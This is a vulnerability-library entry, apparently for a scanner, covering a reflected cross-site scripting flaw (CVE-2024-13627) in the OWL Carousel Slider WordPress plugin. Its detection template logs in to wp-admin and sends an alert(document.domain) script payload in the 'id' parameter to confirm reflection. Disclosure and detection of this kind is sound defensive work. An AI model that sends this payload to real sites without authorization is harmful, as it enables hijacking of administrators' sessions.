/Vulnerability Library

OWL Carousel Slider - Cross-Site Scripting

CVE-2024-13627
Verified

Description

OWL Carousel Slider WordPress plugin v2.2 contains a reflected cross-site scripting caused by unsanitized parameter output in the page, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires attacker to craft malicious URL.

Severity

Medium

CVSS Score

4.7

Exploit Probability

1%

Affected Product

owl_carousel_slider

Published Date

February 7, 2026

Template Author

sourabh-sahu

CVE-2024-13627.yaml
id: CVE-2024-13627

info:
  name: OWL Carousel Slider - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    OWL Carousel Slider WordPress plugin v2.2 contains a reflected cross-site scripting caused by unsanitized parameter output in the page, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires attacker to craft malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed or apply security patches that sanitize and escape parameters properly.
  reference:
    - https://wpscan.com/vulnerability/f7e425a1-ae49-4ea6-abe4-42ba2713af8f/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 4.7
    cve-id: CVE-2024-13627
    cwe-id: CWE-79
    epss-score: 0.00805
    epss-percentile: 0.52439
    cpe: cpe:2.3:a:wp-buy:owl_carousel_slider:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wp-buy
    product: owl_carousel_slider
  tags: cve,cve2024,wp-scan,wp-plugin,wp-buy,owl-carousel-slider

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=wpoc_edit&id=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>")
        condition: and
# digest: 4b0a00483046022100e1480de62677c201467e1dfd328d0eecd8fa6031909a06bb431a07949576c74d022100ca11372452c88d6700bfb0716bb2ff8e6b878a31d24d1b56a1ec1ffb101fe99a:922c64590222798bb761d5b6d8e72950
4.7Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CVE ID:
cve-2024-13627
CWE ID:
cwe-79

References

https://wpscan.com/vulnerability/f7e425a1-ae49-4ea6-abe4-42ba2713af8f/

Remediation Steps

Update to the latest version of the plugin where the issue is fixed or apply security patches that sanitize and escape parameters properly.